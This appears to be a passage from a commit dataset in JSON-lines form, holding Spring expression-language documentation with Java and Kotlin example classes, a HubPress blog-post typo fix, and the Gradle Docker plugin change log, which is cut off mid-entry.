{\n\n\t\tpublic String getExpressionPrefix() {\n\t\t\treturn \"#{\";\n\t\t}\n\n\t\tpublic String getExpressionSuffix() {\n\t\t\treturn \"}\";\n\t\t}\n\n\t\tpublic boolean isTemplate() {\n\t\t\treturn true;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass TemplateParserContext : ParserContext {\n\n\t\toverride fun getExpressionPrefix(): String {\n\t\t\treturn \"#{\"\n\t\t}\n\n\t\toverride fun getExpressionSuffix(): String {\n\t\t\treturn \"}\"\n\t\t}\n\n\t\toverride fun isTemplate(): Boolean {\n\t\t\treturn true\n\t\t}\n\t}\n----\n\n\n[[expressions-example-classes]]\n== Classes Used in the Examples\n\nThis section lists the classes used in the examples throughout this chapter.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Inventor.Java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.Date;\n\timport java.util.GregorianCalendar;\n\n\tpublic class Inventor {\n\n\t\tprivate String name;\n\t\tprivate String nationality;\n\t\tprivate String[] inventions;\n\t\tprivate Date birthdate;\n\t\tprivate PlaceOfBirth placeOfBirth;\n\n\t\tpublic Inventor(String name, String nationality) {\n\t\t\tGregorianCalendar c= new GregorianCalendar();\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = c.getTime();\n\t\t}\n\n\t\tpublic Inventor(String name, Date birthdate, String nationality) {\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic Inventor() {\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic String getNationality() {\n\t\t\treturn nationality;\n\t\t}\n\n\t\tpublic void setNationality(String nationality) {\n\t\t\tthis.nationality = nationality;\n\t\t}\n\n\t\tpublic Date getBirthdate() {\n\t\t\treturn birthdate;\n\t\t}\n\n\t\tpublic void setBirthdate(Date birthdate) {\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic PlaceOfBirth getPlaceOfBirth() {\n\t\t\treturn placeOfBirth;\n\t\t}\n\n\t\tpublic void setPlaceOfBirth(PlaceOfBirth placeOfBirth) {\n\t\t\tthis.placeOfBirth = placeOfBirth;\n\t\t}\n\n\t\tpublic void setInventions(String[] inventions) {\n\t\t\tthis.inventions = inventions;\n\t\t}\n\n\t\tpublic String[] getInventions() {\n\t\t\treturn inventions;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Inventor.kt\n----\nclass Inventor(\n\tvar name: String,\n\tvar nationality: String,\n\tvar inventions: Array<String>? = null,\n\tvar birthdate: Date = GregorianCalendar().time,\n\tvar placeOfBirth: PlaceOfBirth? = null)\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.PlaceOfBirth.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\tpublic class PlaceOfBirth {\n\n\t\tprivate String city;\n\t\tprivate String country;\n\n\t\tpublic PlaceOfBirth(String city) {\n\t\t\tthis.city=city;\n\t\t}\n\n\t\tpublic PlaceOfBirth(String city, String country) {\n\t\t\tthis(city);\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getCity() {\n\t\t\treturn city;\n\t\t}\n\n\t\tpublic void setCity(String s) {\n\t\t\tthis.city = s;\n\t\t}\n\n\t\tpublic String getCountry() {\n\t\t\treturn country;\n\t\t}\n\n\t\tpublic void setCountry(String country) {\n\t\t\tthis.country = country;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.PlaceOfBirth.kt\n----\n\tclass PlaceOfBirth(var city: String, var country: String? = null) {\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Society.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.*;\n\n\tpublic class Society {\n\n\t\tprivate String name;\n\n\t\tpublic static String Advisors = \"advisors\";\n\t\tpublic static String President = \"president\";\n\n\t\tprivate List<Inventor> members = new ArrayList<Inventor>();\n\t\tprivate Map officers = new HashMap();\n\n\t\tpublic List getMembers() {\n\t\t\treturn members;\n\t\t}\n\n\t\tpublic Map getOfficers() {\n\t\t\treturn officers;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic boolean isMember(String name) {\n\t\t\tfor (Inventor inventor : members) {\n\t\t\t\tif (inventor.getName().equals(name)) {\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Society.kt\n----\n\tpackage org.spring.samples.spel.inventor\n\n\timport java.util.*\n\n\tclass Society {\n\n\t\tval Advisors = \"advisors\"\n\t\tval President = \"president\"\n\n\t\tvar name: String? = null\n\n\t\tval members = ArrayList<Inventor>()\n\t\tval officers = mapOf<Any, Any>()\n\n\t\tfun isMember(name: String): Boolean {\n\t\t\tfor (inventor in members) {\n\t\t\t\tif (inventor.name == name) {\n\t\t\t\t\treturn true\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"766c97d34765858bf3dbbaddafb13c057d3995cb","subject":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","message":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","repos":"HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_contents":"= Update: What's New in Version 0.4.0\n:hp-tags: release\n\nIt's been a year since HubPress launched. How time flies!\n\n1,976 forks.\n\n2,205 stars.\n\nHundreds of progressive blogs using HubPress and Asciidoctor to write scaleable content, in an easy-to-use product. \n\nBest of all, it's totally free!\n\n== Material design\n\nTo give HubPress a modern, progressive User Interface, we've redesigned it using the Material design template.\n\nThis provides an even better responsive design for mobile users, and provides a clean interface for new and existing blogger.\n\n== Development process\n\nHubPress is moving away from developing in the https:\/\/github.com\/HubPress\/hubpress.io[hubpress.io] repository. \nTo ensure the hubpress.io repository remains clean for new adopters, development has shifted to https:\/\/github.com\/HubPress\/dev.hubpress.io[dev.hubpress.io].\n\nThe process to commit a change to HubPress is changed to the following:\n\n. Create an issue describing the change you propose.\n. Fork https:\/\/github.com\/HubPress\/dev.hubpress.io\n. Checkout the branch *development*\n. Create a branch in your forked repo and make the change.\n. Open a Pull Request (PR), and summarise your changes, linking to the issue you created.\n\nOnce we receive your PR, we'll review your changes and then either accept them or ask for further changes before final acceptance.\n\nThe new repository is backed by Continuous Integration tasks provisioned through Travis-CI, which trigger automatically once a change to `\/master` is detected.\n\nIt's a more scalable way to manage HubPress moving forward.\n\n== Theme\n\nHubPress uses the professional-looking Ghost themes to allow you to personalise your Blog. It's been a year since release, so it's time for a couple of new looks. \n\nuno-zen::\n This theme, created by https:\/\/twitter.com\/kikobeats[Kiko Beats], is a simplified theme you can use for a more \"docs-site\" looking blog:\n * Great for long-form blogs, \n * Looks great with pinned posts.\n\nghostium::\n This theme, created by https:\/\/twitter.com\/oswaldoacauan[Oswaldo Acauan], is focused on content and based on Medium:\n * Focused on content, \n * Fully responsive.","old_contents":"= Update: What's New in Version 0.4.0\n:hp-tags: release\n\nIt's been a year since HubPress launched. How time flies!\n\n1,976 forks.\n\n2,205 stars.\n\nHundreds of progressive blogs using HubPress and Asciidoctor to write scaleable content, in an easy-to-use product. \n\nBest of all, it's totally free!\n\n== Material design\n\nTo give HubPress a modern, progressive User Interface, we've redesigned it using the Material design template.\n\nThis provides an even better responsive design for mobile users, and provides a clean interface for new and existing blogger.\n\n== Development process\n\nHubPress is moving away from developing in the https:\/\/github.com\/HubPress\/hubpress.io[hubpress.io] repository. \nTo ensure the hubpress.io repository remains clean for new adopters, development has shifted to https:\/\/github.com\/HubPress\/dev.hubpress.io[dev.hubpress.io].\n\nThe process to commit a change to HubPress is changed to the following:\n\n. Create an issue describing the change you propose.\n. Fork https:\/\/github.com\/HubPress\/dev.hubpress.io\n. Checkout the branch *development*\n. Create a branch in your forked repo and make the change.\n. Open a Pull Request (PR), and summarise your changes, linking to the issue you created.\n\nOnce we receive your PR, we'll review your changes and then either accept them or ask for further changes before final acceptance.\n\nThe new repository is backed by Continuous Integration tasks provisioned through Travis-CI, which trigger automatically once a change to `\/master` is detected.\n\nIt's a more scalable way to manage HubPress moving forward.\n\n== Theme\n\nHubPress uses the professional-looking Ghost themes to allow you to personalise your Blog. It's been a year since release, so it's time for a couple of new looks. \n\nuno-zen::\n This theme, cerated by https:\/\/twitter.com\/kikobeats[Kiko Beats] is a simplified theme you can use for a more \"docs-site\" looking blog:\n * Great for long-form blogs, \n * Looks great with pinned posts.\n\nghostium::\n This theme, created by https:\/\/twitter.com\/oswaldoacauan[Oswaldo Acauan] is focused on content and based on Medium:\n * Focused on content, \n * Fully responsive.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"01a3c96e7287905cb8d7c09f4d3a98f649232c82","subject":"Add fix to change log","message":"Add fix to change log\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n * Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n * Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n * Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n * Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 